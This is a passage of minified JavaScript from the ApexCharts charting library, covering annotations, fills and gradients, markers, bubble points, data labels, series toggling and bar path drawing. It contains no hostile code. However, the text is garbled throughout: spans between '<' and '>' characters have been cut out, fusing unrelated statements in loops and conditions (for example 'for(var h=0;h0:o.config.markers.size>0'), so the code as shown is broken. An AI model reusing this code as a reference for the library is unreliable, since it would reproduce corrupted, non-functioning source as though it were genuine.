0,cssClass:""}}},axisBorder:{show:!0,color:"#e0e0e0",width:"100%",height:1,offsetX:0,offsetY:0},axisTicks:{show:!0,color:"#e0e0e0",height:6,offsetX:0,offsetY:0},tickAmount:void 0,tickPlacement:"on",min:void 0,max:void 0,range:void 0,floating:!1,decimalsInFloat:void 0,position:"bottom",title:{text:void 0,offsetX:0,offsetY:0,style:{color:void 0,fontSize:"12px",fontWeight:900,fontFamily:void 0,cssClass:""}},crosshairs:{show:!0,width:1,position:"back",opacity:.9,stroke:{color:"#b6b6b6",width:1,dashArray:3},fill:{type:"solid",color:"#B1B9C4",gradient:{colorFrom:"#D8E3F0",colorTo:"#BED1E6",stops:[0,100],opacityFrom:.4,opacityTo:.5}},dropShadow:{enabled:!1,left:0,top:0,blur:1,opacity:.4}},tooltip:{enabled:!0,offsetY:0,formatter:void 0,style:{fontSize:"12px",fontFamily:void 0}}},yaxis:this.yAxis,theme:{mode:"light",palette:"palette1",monochrome:{enabled:!1,color:"#008FFB",shadeTo:"light",shadeIntensity:.65}}}}}]),e}(),T=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.graphics=new S(this.ctx),this.w.globals.isBarHorizontal&&(this.invertAxis=!0),this.helpers=new w(this),this.xAxisAnnotations=new M(this),this.yAxisAnnotations=new j(this),this.pointsAnnotations=new C(this),this.w.globals.isBarHorizontal&&this.w.config.yaxis[0].reversed&&(this.inversedReversedAxis=!0),this.xDivision=this.w.globals.gridWidth/this.w.globals.dataPoints}return u(e,[{key:"drawAxesAnnotations",value:function(){var e=this.w;if(e.globals.axisCharts){for(var a=this.yAxisAnnotations.drawYAxisAnnotations(),n=this.xAxisAnnotations.drawXAxisAnnotations(),i=this.pointsAnnotations.drawPointAnnotations(),t=e.config.chart.animations.enabled,r=[a,n,i],o=[n.node,a.node,i.node],s=0;s<3;s++)e.globals.dom.elGraphical.add(r[s]),!t||e.globals.resized||e.globals.dataChanged||"scatter"!==e.config.chart.type&&"bubble"!==e.config.chart.type&&e.globals.dataPoints>1&&o[s].classList.add("apexcharts-element-hidden"),e.globals.delayedElements.push({el:o[s],index:0});this.helpers.annotationsBackground()}}},{key:"drawImageAnnos",value:function(){var e=this;this.w.config.annotations.images.map((function(a,n){e.addImage(a,n)}))}},{key:"drawTextAnnos",value:function(){var e=this;this.w.config.annotations.texts.map((function(a,n){e.addText(a,n)}))}},{key:"addXaxisAnnotation",value:function(e,a,n){this.xAxisAnnotations.addXaxisAnnotation(e,a,n)}},{key:"addYaxisAnnotation",value:function(e,a,n){this.yAxisAnnotations.addYaxisAnnotation(e,a,n)}},{key:"addPointAnnotation",value:function(e,a,n){this.pointsAnnotations.addPointAnnotation(e,a,n)}},{key:"addText",value:function(e,a){var n=e.x,i=e.y,t=e.text,r=e.textAnchor,o=e.foreColor,s=e.fontSize,l=e.fontFamily,u=e.fontWeight,c=e.cssClass,d=e.backgroundColor,h=e.borderWidth,p=e.strokeDashArray,m=e.borderRadius,f=e.borderColor,v=e.appendTo,g=void 0===v?".apexcharts-annotations":v,b=e.paddingLeft,k=void 0===b?4:b,y=e.paddingRight,x=void 0===y?4:y,S=e.paddingBottom,A=void 0===S?2:S,w=e.paddingTop,M=void 0===w?2:w,j=this.w,C=this.graphics.drawText({x:n,y:i,text:t,textAnchor:r||"start",fontSize:s||"12px",fontWeight:u||"regular",fontFamily:l||j.config.chart.fontFamily,foreColor:o||j.config.chart.foreColor,cssClass:c}),P=j.globals.dom.baseEl.querySelector(g);P&&P.appendChild(C.node);var B=C.bbox();if(t){var T=this.graphics.drawRect(B.x-k,B.y-M,B.width+k+x,B.height+A+M,m,d||"transparent",1,h,f,p);P.insertBefore(T.node,C.node)}}},{key:"addImage",value:function(e,a){var n=this.w,i=e.path,t=e.x,r=void 0===t?0:t,o=e.y,s=void 0===o?0:o,l=e.width,u=void 0===l?20:l,c=e.height,d=void 0===c?20:c,h=e.appendTo,p=void 0===h?".apexcharts-annotations":h,m=n.globals.dom.Paper.image(i);m.size(u,d).move(r,s);var f=n.globals.dom.baseEl.querySelector(p);return f&&f.appendChild(m.node),m}},{key:"addXaxisAnnotationExternal",value:function(e,a,n){return this.addAnnotationExternal({params:e,pushToMemory:a,context:n,type:"xaxis",contextMethod:n.addXaxisAnnotation}),n}},{key:"addYaxisAnnotationExternal",value:function(e,a,n){return this.addAnnotationExternal({params:e,pushToMemory:a,context:n,type:"yaxis",contextMethod:n.addYaxisAnnotation}),n}},{key:"addPointAnnotationExternal",value:function(e,a,n){return void 0===this.invertAxis&&(this.invertAxis=n.w.globals.isBarHorizontal),this.addAnnotationExternal({params:e,pushToMemory:a,context:n,type:"point",contextMethod:n.addPointAnnotation}),n}},{key:"addAnnotationExternal",value:function(e){var a=e.params,n=e.pushToMemory,i=e.context,t=e.type,r=e.contextMethod,o=i,s=o.w,l=s.globals.dom.baseEl.querySelector(".apexcharts-".concat(t,"-annotations")),u=l.childNodes.length+1,c=new B,d=Object.assign({},"xaxis"===t?c.xAxisAnnotation:"yaxis"===t?c.yAxisAnnotation:c.pointAnnotation),h=k.extend(d,a);switch(t){case"xaxis":this.addXaxisAnnotation(h,l,u);break;case"yaxis":this.addYaxisAnnotation(h,l,u);break;case"point":this.addPointAnnotation(h,l,u)}var p=s.globals.dom.baseEl.querySelector(".apexcharts-".concat(t,"-annotations .apexcharts-").concat(t,"-annotation-label[rel='").concat(u,"']")),m=this.helpers.addBackgroundToAnno(p,h);return m&&l.insertBefore(m.node,p),n&&s.globals.memory.methodsToExec.push({context:o,id:h.id?h.id:k.randomId(),method:r,label:"addAnnotation",params:a}),i}},{key:"clearAnnotations",value:function(e){var a=e.w,n=a.globals.dom.baseEl.querySelectorAll(".apexcharts-yaxis-annotations, .apexcharts-xaxis-annotations, .apexcharts-point-annotations");a.globals.memory.methodsToExec.map((function(e,n){"addText"!==e.label&&"addAnnotation"!==e.label||a.globals.memory.methodsToExec.splice(n,1)})),n=k.listToArray(n),Array.prototype.forEach.call(n,(function(e){for(;e.firstChild;)e.removeChild(e.firstChild)}))}},{key:"removeAnnotation",value:function(e,a){var n=e.w,i=n.globals.dom.baseEl.querySelectorAll(".".concat(a));i&&(n.globals.memory.methodsToExec.map((function(e,i){e.id===a&&n.globals.memory.methodsToExec.splice(i,1)})),Array.prototype.forEach.call(i,(function(e){e.parentElement.removeChild(e)})))}}]),e}(),L=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.opts=null,this.seriesIndex=0}return u(e,[{key:"clippedImgArea",value:function(e){var a=this.w,n=a.config,i=parseInt(a.globals.gridWidth,10),t=parseInt(a.globals.gridHeight,10),r=i>t?i:t,o=e.image,s=0,l=0;void 0===e.width&&void 0===e.height?void 0!==n.fill.image.width&&void 0!==n.fill.image.height?(s=n.fill.image.width+1,l=n.fill.image.height):(s=r+1,l=r):(s=e.width,l=e.height);var u=document.createElementNS(a.globals.SVGNS,"pattern");S.setAttrs(u,{id:e.patternID,patternUnits:e.patternUnits?e.patternUnits:"userSpaceOnUse",width:s+"px",height:l+"px"});var c=document.createElementNS(a.globals.SVGNS,"image");u.appendChild(c),c.setAttributeNS(window.SVG.xlink,"href",o),S.setAttrs(c,{x:0,y:0,preserveAspectRatio:"none",width:s+"px",height:l+"px"}),c.style.opacity=e.opacity,a.globals.dom.elDefs.node.appendChild(u)}},{key:"getSeriesIndex",value:function(e){var a=this.w;return("bar"===a.config.chart.type||"rangeBar"===a.config.chart.type)&&a.config.plotOptions.bar.distributed||"heatmap"===a.config.chart.type||"treemap"===a.config.chart.type?this.seriesIndex=e.seriesNumber:this.seriesIndex=e.seriesNumber%a.globals.series.length,this.seriesIndex}},{key:"fillPath",value:function(e){var a=this.w;this.opts=e;var n,i,t,r=this.w.config;this.seriesIndex=this.getSeriesIndex(e);var o=this.getFillColors()[this.seriesIndex];void 0!==a.globals.seriesColors[this.seriesIndex]&&(o=a.globals.seriesColors[this.seriesIndex]),"function"==typeof o&&(o=o({seriesIndex:this.seriesIndex,dataPointIndex:e.dataPointIndex,value:e.value,w:a}));var s=this.getFillType(this.seriesIndex),l=Array.isArray(r.fill.opacity)?r.fill.opacity[this.seriesIndex]:r.fill.opacity;e.color&&(o=e.color);var u=o;if(-1===o.indexOf("rgb")?o.length<9&&(u=k.hexToRgba(o,l)):o.indexOf("rgba")>-1&&(l=k.getOpacityFromRGBA(o)),e.opacity&&(l=e.opacity),"pattern"===s&&(i=this.handlePatternFill(i,o,l,u)),"gradient"===s&&(t=this.handleGradientFill(o,l,this.seriesIndex)),"image"===s){var c=r.fill.image.src,d=e.patternID?e.patternID:"";this.clippedImgArea({opacity:l,image:Array.isArray(c)?e.seriesNumber-1&&(c=k.getOpacityFromRGBA(u));var d=void 0===t.fill.gradient.opacityTo?a:Array.isArray(t.fill.gradient.opacityTo)?t.fill.gradient.opacityTo[n]:t.fill.gradient.opacityTo;if(void 0===t.fill.gradient.gradientToColors||0===t.fill.gradient.gradientToColors.length)i="dark"===t.fill.gradient.shade?s.shadeColor(-1*parseFloat(t.fill.gradient.shadeIntensity),e.indexOf("rgb")>-1?k.rgb2hex(e):e):s.shadeColor(parseFloat(t.fill.gradient.shadeIntensity),e.indexOf("rgb")>-1?k.rgb2hex(e):e);else if(t.fill.gradient.gradientToColors[r.seriesNumber]){var h=t.fill.gradient.gradientToColors[r.seriesNumber];i=h,h.indexOf("rgba")>-1&&(d=k.getOpacityFromRGBA(h))}else i=e;if(t.fill.gradient.inverseColors){var p=u;u=i,i=p}return u.indexOf("rgb")>-1&&(u=k.rgb2hex(u)),i.indexOf("rgb")>-1&&(i=k.rgb2hex(i)),o.drawGradient(l,u,i,c,d,r.size,t.fill.gradient.stops,t.fill.gradient.colorStops,n)}}]),e}(),z=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"setGlobalMarkerSize",value:function(){var e=this.w;if(e.globals.markers.size=Array.isArray(e.config.markers.size)?e.config.markers.size:[e.config.markers.size],e.globals.markers.size.length>0){if(e.globals.markers.size.length4&&void 0!==arguments[4]&&arguments[4],o=this.w,s=a,l=e,u=null,c=new S(this.ctx),d=o.config.markers.discrete&&o.config.markers.discrete.length;if((o.globals.markers.size[a]>0||r||d)&&(u=c.group({class:r||d?"":"apexcharts-series-markers"})).attr("clip-path","url(#gridRectMarkerMask".concat(o.globals.cuid,")")),Array.isArray(l.x))for(var h=0;h0:o.config.markers.size>0;if(f||r||d){k.isNumber(l.y[h])?m+=" w".concat(k.randomId()):m="apexcharts-nullpoint";var v=this.getMarkerConfig({cssClass:m,seriesIndex:a,dataPointIndex:p});o.config.series[s].data[p]&&(o.config.series[s].data[p].fillColor&&(v.pointFillColor=o.config.series[s].data[p].fillColor),o.config.series[s].data[p].strokeColor&&(v.pointStrokeColor=o.config.series[s].data[p].strokeColor)),i&&(v.pSize=i),(t=c.drawMarker(l.x[h],l.y[h],v)).attr("rel",p),t.attr("j",p),t.attr("index",a),t.node.setAttribute("default-marker-size",v.pSize);var g=new x(this.ctx);g.setSelectionFilter(t,a,p),this.addEvents(t),u&&u.add(t)}else void 0===o.globals.pointsArray[a]&&(o.globals.pointsArray[a]=[]),o.globals.pointsArray[a].push([l.x[h],l.y[h]])}return u}},{key:"getMarkerConfig",value:function(e){var a=e.cssClass,n=e.seriesIndex,i=e.dataPointIndex,t=void 0===i?null:i,r=e.finishRadius,o=void 0===r?null:r,s=this.w,l=this.getMarkerStyle(n),u=s.globals.markers.size[n],c=s.config.markers;return null!==t&&c.discrete.length&&c.discrete.map((function(e){e.seriesIndex===n&&e.dataPointIndex===t&&(l.pointStrokeColor=e.strokeColor,l.pointFillColor=e.fillColor,u=e.size,l.pointShape=e.shape)})),{pSize:null===o?u:o,pRadius:c.radius,width:Array.isArray(c.width)?c.width[n]:c.width,height:Array.isArray(c.height)?c.height[n]:c.height,pointStrokeWidth:Array.isArray(c.strokeWidth)?c.strokeWidth[n]:c.strokeWidth,pointStrokeColor:l.pointStrokeColor,pointFillColor:l.pointFillColor,shape:l.pointShape||(Array.isArray(c.shape)?c.shape[n]:c.shape),class:a,pointStrokeOpacity:Array.isArray(c.strokeOpacity)?c.strokeOpacity[n]:c.strokeOpacity,pointStrokeDashArray:Array.isArray(c.strokeDashArray)?c.strokeDashArray[n]:c.strokeDashArray,pointFillOpacity:Array.isArray(c.fillOpacity)?c.fillOpacity[n]:c.fillOpacity,seriesIndex:n}}},{key:"addEvents",value:function(e){var a=this.w,n=new S(this.ctx);e.node.addEventListener("mouseenter",n.pathMouseEnter.bind(this.ctx,e)),e.node.addEventListener("mouseleave",n.pathMouseLeave.bind(this.ctx,e)),e.node.addEventListener("mousedown",n.pathMouseDown.bind(this.ctx,e)),e.node.addEventListener("click",a.config.markers.onClick),e.node.addEventListener("dblclick",a.config.markers.onDblClick),e.node.addEventListener("touchstart",n.pathMouseDown.bind(this.ctx,e),{passive:!0})}},{key:"getMarkerStyle",value:function(e){var a=this.w,n=a.globals.markers.colors,i=a.config.markers.strokeColor||a.config.markers.strokeColors;return{pointStrokeColor:Array.isArray(i)?i[e]:i,pointFillColor:Array.isArray(n)?n[e]:n}}}]),e}(),N=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.initialAnim=this.w.config.chart.animations.enabled,this.dynamicAnim=this.initialAnim&&this.w.config.chart.animations.dynamicAnimation.enabled}return u(e,[{key:"draw",value:function(e,a,n){var i=this.w,t=new S(this.ctx),r=n.realIndex,o=n.pointsPos,s=n.zRatio,l=n.elParent,u=t.group({class:"apexcharts-series-markers apexcharts-series-".concat(i.config.chart.type)});if(u.attr("clip-path","url(#gridRectMarkerMask".concat(i.globals.cuid,")")),Array.isArray(o.x))for(var c=0;cf.maxBubbleRadius&&(m=f.maxBubbleRadius)}i.config.chart.animations.enabled||(p=m);var v=o.x[c],g=o.y[c];if(p=p||0,null!==g&&void 0!==i.globals.series[r][d]||(h=!1),h){var b=this.drawPoint(v,g,p,m,r,d,a);u.add(b)}l.add(u)}}},{key:"drawPoint",value:function(e,a,n,i,t,r,o){var s=this.w,l=t,u=new y(this.ctx),c=new x(this.ctx),d=new L(this.ctx),h=new z(this.ctx),p=new S(this.ctx),m=h.getMarkerConfig({cssClass:"apexcharts-marker",seriesIndex:l,dataPointIndex:r,finishRadius:"bubble"===s.config.chart.type||s.globals.comboCharts&&s.config.series[t]&&"bubble"===s.config.series[t].type?i:null});i=m.pSize;var f,v=d.fillPath({seriesNumber:t,dataPointIndex:r,color:m.pointFillColor,patternUnits:"objectBoundingBox",value:s.globals.series[t][o]});if("circle"===m.shape?f=p.drawCircle(n):"square"!==m.shape&&"rect"!==m.shape||(f=p.drawRect(0,0,m.width-m.pointStrokeWidth/2,m.height-m.pointStrokeWidth/2,m.pRadius)),s.config.series[l].data[r]&&s.config.series[l].data[r].fillColor&&(v=s.config.series[l].data[r].fillColor),f.attr({x:e-m.width/2-m.pointStrokeWidth/2,y:a-m.height/2-m.pointStrokeWidth/2,cx:e,cy:a,fill:v,"fill-opacity":m.pointFillOpacity,stroke:m.pointStrokeColor,r:i,"stroke-width":m.pointStrokeWidth,"stroke-dasharray":m.pointStrokeDashArray,"stroke-opacity":m.pointStrokeOpacity}),s.config.chart.dropShadow.enabled){var g=s.config.chart.dropShadow;c.dropShadow(f,g,t)}if(!this.initialAnim||s.globals.dataChanged||s.globals.resized)s.globals.animationEnded=!0;else{var b=s.config.chart.animations.speed;u.animateMarker(f,0,"circle"===m.shape?i:{width:m.width,height:m.height},b,s.globals.easing,(function(){window.setTimeout((function(){u.animationCompleted(f)}),100)}))}if(s.globals.dataChanged&&"circle"===m.shape)if(this.dynamicAnim){var k,A,w,M,j=s.config.chart.animations.dynamicAnimation.speed;null!=(M=s.globals.previousPaths[t]&&s.globals.previousPaths[t][o])&&(k=M.x,A=M.y,w=void 0!==M.r?M.r:i);for(var C=0;Cs.globals.gridHeight+d&&(a=s.globals.gridHeight+d/2),void 0===s.globals.dataLabelsRects[i]&&(s.globals.dataLabelsRects[i]=[]),s.globals.dataLabelsRects[i].push({x:e,y:a,width:c,height:d});var h=s.globals.dataLabelsRects[i].length-2,p=void 0!==s.globals.lastDrawnDataLabelsIndexes[i]?s.globals.lastDrawnDataLabelsIndexes[i][s.globals.lastDrawnDataLabelsIndexes[i].length-1]:0;if(void 0!==s.globals.dataLabelsRects[i][h]){var m=s.globals.dataLabelsRects[i][p];(e>m.x+m.width+2||a>m.y+m.height+2||e+c4&&void 0!==arguments[4]?arguments[4]:2,r=this.w,o=new S(this.ctx),s=r.config.dataLabels,l=0,u=0,c=n,d=null;if(!s.enabled||!Array.isArray(e.x))return d;d=o.group({class:"apexcharts-data-labels"});for(var h=0;ha.globals.gridWidth+f.textRects.width+10)&&(s="");var v=a.globals.dataLabels.style.colors[r];(("bar"===a.config.chart.type||"rangeBar"===a.config.chart.type)&&a.config.plotOptions.bar.distributed||a.config.dataLabels.distributed)&&(v=a.globals.dataLabels.style.colors[o]),"function"==typeof v&&(v=v({series:a.globals.series,seriesIndex:r,dataPointIndex:o,w:a})),h&&(v=h);var g=d.offsetX,b=d.offsetY;if("bar"!==a.config.chart.type&&"rangeBar"!==a.config.chart.type||(g=0,b=0),f.drawnextLabel){var k=n.drawText({width:100,height:parseInt(d.style.fontSize,10),x:i+g,y:t+b,foreColor:v,textAnchor:l||d.textAnchor,text:s,fontSize:u||d.style.fontSize,fontFamily:d.style.fontFamily,fontWeight:d.style.fontWeight||"normal"});if(k.attr({class:"apexcharts-datalabel",cx:i,cy:t}),d.dropShadow.enabled){var y=d.dropShadow;new x(this.ctx).dropShadow(k,y)}c.add(k),void 0===a.globals.lastDrawnDataLabelsIndexes[r]&&(a.globals.lastDrawnDataLabelsIndexes[r]=[]),a.globals.lastDrawnDataLabelsIndexes[r].push(o)}}}},{key:"addBackgroundToDataLabel",value:function(e,a){var n=this.w,i=n.config.dataLabels.background,t=i.padding,r=i.padding/2,o=a.width,s=a.height,l=new S(this.ctx).drawRect(a.x-t,a.y-r/2,o+2*t,s+r,i.borderRadius,"transparent"===n.config.chart.background?"#fff":n.config.chart.background,i.opacity,i.borderWidth,i.borderColor);return i.dropShadow.enabled&&new x(this.ctx).dropShadow(l,i.dropShadow),l}},{key:"dataLabelsBackground",value:function(){var e=this.w;if("bubble"!==e.config.chart.type)for(var a=e.globals.dom.baseEl.querySelectorAll(".apexcharts-datalabels text"),n=0;nn.globals.gridHeight&&(c=n.globals.gridHeight-h)),{bcx:o,bcy:r,dataLabelsX:a,dataLabelsY:c}}},{key:"calculateBarsDataLabelsPosition",value:function(e){var a=this.w,n=e.x,i=e.i,t=e.j,r=e.bcy,o=e.barHeight,s=e.barWidth,l=e.textRects,u=e.dataLabelsX,c=e.strokeWidth,d=e.barDataLabelsConfig,h=e.offX,p=e.offY,m=a.globals.gridHeight/a.globals.dataPoints;s=Math.abs(s);var f=r-(this.barCtx.isRangeBar?0:m)+o/2+l.height/2+p-3,v=this.barCtx.series[i][t]<0,g=n;switch(this.barCtx.isReversed&&(g=n+s-(v?2*s:0),n=a.globals.gridWidth-s),d.position){case"center":u=v?g+s/2-h:Math.max(l.width/2,g-s/2)+h;break;case"bottom":u=v?g+s-c-Math.round(l.width/2)-h:g-s+c+Math.round(l.width/2)+h;break;case"top":u=v?g-c+Math.round(l.width/2)-h:g-c-Math.round(l.width/2)+h}return a.config.chart.stacked||(u<0?u=u+l.width+c:u+l.width/2>a.globals.gridWidth&&(u=a.globals.gridWidth-l.width-c)),{bcx:n,bcy:r,dataLabelsX:u,dataLabelsY:f}}},{key:"drawCalculatedDataLabels",value:function(e){var a=e.x,n=e.y,i=e.val,t=e.i,o=e.j,s=e.textRects,l=e.barHeight,u=e.barWidth,c=e.dataLabelsConfig,d=this.w,h="rotate(0)";"vertical"===d.config.plotOptions.bar.dataLabels.orientation&&(h="rotate(-90, ".concat(a,", ").concat(n,")"));var p=new E(this.barCtx.ctx),m=new S(this.barCtx.ctx),f=c.formatter,v=null,g=d.globals.collapsedSeriesIndices.indexOf(t)>-1;if(c.enabled&&!g){v=m.group({class:"apexcharts-data-labels",transform:h});var b="";void 0!==i&&(b=f(i,{seriesIndex:t,dataPointIndex:o,w:d}));var k=d.globals.series[t][o]<0,y=d.config.plotOptions.bar.dataLabels.position;"vertical"===d.config.plotOptions.bar.dataLabels.orientation&&("top"===y&&(c.textAnchor=k?"end":"start"),"center"===y&&(c.textAnchor="middle"),"bottom"===y&&(c.textAnchor=k?"end":"start")),this.barCtx.isRangeBar&&this.barCtx.barOptions.dataLabels.hideOverflowingLabels&&uMath.abs(u)&&(b=""):s.height/1.6>Math.abs(l)&&(b=""));var x=r({},c);this.barCtx.isHorizontal&&i<0&&("start"===c.textAnchor?x.textAnchor="end":"end"===c.textAnchor&&(x.textAnchor="start")),p.plotDataLabelsText({x:a,y:n,text:b,i:t,j:o,parent:v,dataLabelsConfig:x,alwaysDrawDataLabel:!0,offsetCorrection:!0})}return v}}]),e}(),K=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.legendInactiveClass="legend-mouseover-inactive"}return u(e,[{key:"getAllSeriesEls",value:function(){return this.w.globals.dom.baseEl.getElementsByClassName("apexcharts-series")}},{key:"getSeriesByName",value:function(e){return this.w.globals.dom.baseEl.querySelector(".apexcharts-inner .apexcharts-series[seriesName='".concat(k.escapeString(e),"']"))}},{key:"isSeriesHidden",value:function(e){var a=this.getSeriesByName(e),n=parseInt(a.getAttribute("data:realIndex"),10);return{isHidden:a.classList.contains("apexcharts-series-collapsed"),realIndex:n}}},{key:"addCollapsedClassToSeries",value:function(e,a){var n=this.w;function i(n){for(var i=0;i0&&void 0!==arguments[0])||arguments[0],a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],i=this.w,t=k.clone(i.globals.initialSeries);i.globals.previousPaths=[],n?(i.globals.collapsedSeries=[],i.globals.ancillaryCollapsedSeries=[],i.globals.collapsedSeriesIndices=[],i.globals.ancillaryCollapsedSeriesIndices=[]):t=this.emptyCollapsedSeries(t),i.config.series=t,e&&(a&&(i.globals.zoomed=!1,this.ctx.updateHelpers.revertDefaultAxisMinMax()),this.ctx.updateHelpers._updateSeries(t,i.config.chart.animations.dynamicAnimation.enabled))}},{key:"emptyCollapsedSeries",value:function(e){for(var a=this.w,n=0;n-1&&(e[n].data=[]);return e}},{key:"toggleSeriesOnHover",value:function(e,a){var n=this.w;a||(a=e.target);var i=n.globals.dom.baseEl.querySelectorAll(".apexcharts-series, .apexcharts-datalabels");if("mousemove"===e.type){var t=parseInt(a.getAttribute("rel"),10)-1,r=null,o=null;n.globals.axisCharts||"radialBar"===n.config.chart.type?n.globals.axisCharts?(r=n.globals.dom.baseEl.querySelector(".apexcharts-series[data\\:realIndex='".concat(t,"']")),o=n.globals.dom.baseEl.querySelector(".apexcharts-datalabels[data\\:realIndex='".concat(t,"']"))):r=n.globals.dom.baseEl.querySelector(".apexcharts-series[rel='".concat(t+1,"']")):r=n.globals.dom.baseEl.querySelector(".apexcharts-series[rel='".concat(t+1,"'] path"));for(var s=0;s=e.from&&i<=e.to&&t[a].classList.remove(n.legendInactiveClass)}}(i.config.plotOptions.heatmap.colorScale.ranges[o])}else"mouseout"===e.type&&r("remove")}},{key:"getActiveConfigSeriesIndex",value:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"asc",n=this.w,i=0;if(n.config.series.length>1)for(var t=n.config.series.map((function(a,i){var t=!1;return e&&(t="bar"===n.config.series[i].type||"column"===n.config.series[i].type),a.data&&a.data.length>0&&!t?i:-1})),r="asc"===a?0:t.length-1;"asc"===a?r=0;"asc"===a?r++:r--)if(-1!==t[r]){i=t[r];break}return i}},{key:"getPreviousPaths",value:function(){var e=this.w;function a(a,n,i){for(var t=a[n].childNodes,r={type:i,paths:[],realIndex:a[n].getAttribute("data:realIndex")},o=0;o0)for(var i=function(a){for(var n=e.globals.dom.baseEl.querySelectorAll(".apexcharts-".concat(e.config.chart.type," .apexcharts-series[data\\:realIndex='").concat(a,"'] rect")),i=[],t=function(e){var a=function(a){return n[e].getAttribute(a)},t={x:parseFloat(a("x")),y:parseFloat(a("y")),width:parseFloat(a("width")),height:parseFloat(a("height"))};i.push({rect:t,color:n[e].getAttribute("color")})},r=0;r0)for(var i=0;i0?e:[]}))}}]),e}(),D=function(){function e(a){s(this,e),this.w=a.w,this.barCtx=a}return u(e,[{key:"initVariables",value:function(e){var a=this.w;this.barCtx.series=e,this.barCtx.totalItems=0,this.barCtx.seriesLen=0,this.barCtx.visibleI=-1,this.barCtx.visibleItems=1;for(var n=0;n0&&(this.barCtx.seriesLen=this.barCtx.seriesLen+1,this.barCtx.totalItems+=e[n].length),a.globals.isXNumeric)for(var i=0;ia.globals.minX&&a.globals.seriesX[n][i]0&&(i=l.globals.minXDiff/d),(r=i/this.barCtx.seriesLen*parseInt(this.barCtx.barOptions.columnWidth,10)/100)<1&&(r=1)}o=l.globals.gridHeight-this.barCtx.baseLineY[this.barCtx.yaxisIndex]-(this.barCtx.isReversed?l.globals.gridHeight:0)+(this.barCtx.isReversed?2*this.barCtx.baseLineY[this.barCtx.yaxisIndex]:0),e=l.globals.padHorizontal+(i-r*this.barCtx.seriesLen)/2}return{x:e,y:a,yDivision:n,xDivision:i,barHeight:t,barWidth:r,zeroH:o,zeroW:s}}},{key:"getPathFillColor",value:function(e,a,n,i){var t=this.w,r=new L(this.barCtx.ctx),o=null,s=this.barCtx.barOptions.distributed?n:a;return this.barCtx.barOptions.colors.ranges.length>0&&this.barCtx.barOptions.colors.ranges.map((function(i){e[a][n]>=i.from&&e[a][n]<=i.to&&(o=i.color)})),t.config.series[a].data[n]&&t.config.series[a].data[n].fillColor&&(o=t.config.series[a].data[n].fillColor),r.fillPath({seriesNumber:this.barCtx.barOptions.distributed?s:i,dataPointIndex:n,color:o,value:e[a][n]})}},{key:"getStrokeWidth",value:function(e,a,n){var i=0,t=this.w;return void 0===this.barCtx.series[e][a]||null===this.barCtx.series[e][a]?this.barCtx.isNullValue=!0:this.barCtx.isNullValue=!1,t.config.stroke.show&&(this.barCtx.isNullValue||(i=Array.isArray(this.barCtx.strokeWidth)?this.barCtx.strokeWidth[n]:this.barCtx.strokeWidth)),i}},{key:"barBackground",value:function(e){var a=e.j,n=e.i,i=e.x1,t=e.x2,r=e.y1,o=e.y2,s=e.elSeries,l=this.w,u=new S(this.barCtx.ctx),c=new K(this.barCtx.ctx).getActiveConfigSeriesIndex();if(this.barCtx.barOptions.colors.backgroundBarColors.length>0&&c===n){a>=this.barCtx.barOptions.colors.backgroundBarColors.length&&(a%=this.barCtx.barOptions.colors.backgroundBarColors.length);var d=this.barCtx.barOptions.colors.backgroundBarColors[a],h=u.drawRect(void 0!==i?i:0,void 0!==r?r:0,void 0!==t?t:l.globals.gridWidth,void 0!==o?o:l.globals.gridHeight,this.barCtx.barOptions.colors.backgroundBarRadius,d,this.barCtx.barOptions.colors.backgroundBarOpacity);s.add(h),h.node.classList.add("apexcharts-backgroundBar")}}},{key:"getColumnPaths",value:function(e){var a=e.barWidth,n=e.barXPosition,i=e.yRatio,t=e.y1,r=e.y2,o=e.strokeWidth,s=e.series,l=e.realIndex,u=e.i,c=e.j,d=e.w,h=new S(this.barCtx.ctx);(o=Array.isArray(o)?o[l]:o)||(o=0);var p={barWidth:a,strokeWidth:o,yRatio:i,barXPosition:n,y1:t,y2:r},m=this.getRoundedBars(d,p,s,u,c),f=n,v=n+a,g=h.move(f,t),b=h.move(f,t),k=h.line(v-o,t);return d.globals.previousPaths.length>0&&(b=this.barCtx.getPreviousPath(l,c,!1)),g=g+h.line(f,m.y2)+m.pathWithRadius+h.line(v-o,m.y2)+k+k+"z",b=b+h.line(f,t)+k+k+k+k+k+h.line(f,t),d.config.chart.stacked&&(this.barCtx.yArrj.push(m.y2),this.barCtx.yArrjF.push(Math.abs(t-m.y2)),this.barCtx.yArrjVal.push(this.barCtx.series[u][c])),{pathTo:g,pathFrom:b}}},{key:"getBarpaths",value:function(e){var a=e.barYPosition,n=e.barHeight,i=e.x1,t=e.x2,r=e.strokeWidth,o=e.series,s=e.realIndex,l=e.i,u=e.j,c=e.w,d=new S(this.barCtx.ctx);(r=Array.isArray(r)?r[s]:r)||(r=0);var h={barHeight:n,strokeWidth:r,barYPosition:a,x2:t,x1:i},p=this.getRoundedBars(c,h,o,l,u),m=d.move(i,a),f=d.move(i,a);c.globals.previousPaths.length>0&&(f=this.barCtx.getPreviousPath(s,u,!1));var v=a,g=a+n,b=d.line(i,g-r);return m=m+d.line(p.x2,v)+p.pathWithRadius+d.line(p.x2,g-r)+b+b+"z",f=f+d.line(i,v)+b+b+b+b+b+d.line(i,v),c.config.chart.stacked&&(this.barCtx.xArrj.push(p.x2),this.barCtx.xArrjF.push(Math.abs(i-p.x2)),this.barCtx.xArrjVal.push(this.barCtx.series[l][u])),{pathTo:m,pathFrom:f}}},{key:"getRoundedBars",value:function(e,a,n,i,t){var r=new S(this.barCtx.ctx),o=0,s=e.config.plotOptions.bar.borderRadius,l=Array.isArray(s);if(o=l?s[i>s.length-1?s.length-1:i]:s,e.config.chart.stacked&&n.length>1&&i!==this.barCtx.radiusOnSeriesNumber&&!l&&(o=0),this.barCtx.isHorizontal){var 